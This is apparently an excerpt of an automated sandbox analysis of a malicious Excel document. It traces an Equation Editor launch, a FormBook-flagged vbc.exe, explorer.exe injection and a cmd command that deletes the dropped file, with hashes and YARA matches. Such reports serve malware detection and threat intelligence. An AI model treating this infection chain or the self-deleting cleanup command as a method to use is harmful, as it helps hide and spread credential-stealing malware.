                                                                                                                                                                      Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <style type="text/css"> html, body, #partner, iframe { height:100%; width:100%; margin:0; padding:0; border:0; outline:0; font-size:100%; vertical-align:baseline; background:transparent; } body { overflow:hidden; } </style> <meta content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;" name="viewport"> </head> <body> <div id="partner"></div> <script type="text/javascript"> document.write( '<script type="text/javascript" language="JavaScript"' + 'src="//sedoparking.com/frmpark/' + window.loc


                                                                                                                                                                      Code Manipulations

                                                                                                                                                                      Statistics

                                                                                                                                                                      Behavior

                                                                                                                                                                      Click to jump to process

                                                                                                                                                                      System Behavior

                                                                                                                                                                      General

                                                                                                                                                                      Start time:21:15:37
                                                                                                                                                                      Start date:26/11/2020
                                                                                                                                                                      Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                                                                                                      Imagebase:0x13f490000
                                                                                                                                                                      File size:27641504 bytes
                                                                                                                                                                      MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high

                                                                                                                                                                      General

                                                                                                                                                                      Start time:21:15:56
                                                                                                                                                                      Start date:26/11/2020
                                                                                                                                                                      Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                      File size:543304 bytes
                                                                                                                                                                      MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high

                                                                                                                                                                      General

                                                                                                                                                                      Start time:21:15:58
                                                                                                                                                                      Start date:26/11/2020
                                                                                                                                                                      Path:C:\Users\Public\vbc.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:'C:\Users\Public\vbc.exe'
                                                                                                                                                                      Imagebase:0xf90000
                                                                                                                                                                      File size:515072 bytes
                                                                                                                                                                      MD5 hash:4A105D55BFF1F7304E01CE7198BADA6B
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2133207139.0000000003421000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2133207139.0000000003421000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2133207139.0000000003421000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2133240259.000000000349B000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2133240259.000000000349B000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2133240259.000000000349B000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.2133084587.0000000002638000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                      • Detection: 25%, ReversingLabs
                                                                                                                                                                      Reputation:low

                                                                                                                                                                      General

                                                                                                                                                                      Start time:21:16:01
                                                                                                                                                                      Start date:26/11/2020
                                                                                                                                                                      Path:C:\Users\Public\vbc.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:{path}
                                                                                                                                                                      Imagebase:0xf90000
                                                                                                                                                                      File size:515072 bytes
                                                                                                                                                                      MD5 hash:4A105D55BFF1F7304E01CE7198BADA6B
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2169851044.00000000002B0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2169851044.00000000002B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2169851044.00000000002B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2169870384.00000000002E0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2169870384.00000000002E0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2169870384.00000000002E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2169888431.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2169888431.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2169888431.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                      Reputation:low

                                                                                                                                                                      General

                                                                                                                                                                      Start time:21:16:02
                                                                                                                                                                      Start date:26/11/2020
                                                                                                                                                                      Path:C:\Windows\explorer.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:
                                                                                                                                                                      Imagebase:0xffca0000
                                                                                                                                                                      File size:3229696 bytes
                                                                                                                                                                      MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:moderate

                                                                                                                                                                      General

                                                                                                                                                                      Start time:21:16:16
                                                                                                                                                                      Start date:26/11/2020
                                                                                                                                                                      Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                      Imagebase:0xf00000
                                                                                                                                                                      File size:2972672 bytes
                                                                                                                                                                      MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2346887922.0000000000220000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2346887922.0000000000220000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2346887922.0000000000220000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2346860528.00000000001F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2346860528.00000000001F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2346860528.00000000001F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2346737399.0000000000080000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2346737399.0000000000080000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2346737399.0000000000080000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                      Reputation:high

                                                                                                                                                                      General

                                                                                                                                                                      Start time:21:16:20
                                                                                                                                                                      Start date:26/11/2020
                                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:/c del 'C:\Users\Public\vbc.exe'
                                                                                                                                                                      Imagebase:0x4abf0000
                                                                                                                                                                      File size:302592 bytes
                                                                                                                                                                      MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high

                                                                                                                                                                      Disassembly

                                                                                                                                                                      Code Analysis

                                                                                                                                                                      Reset < >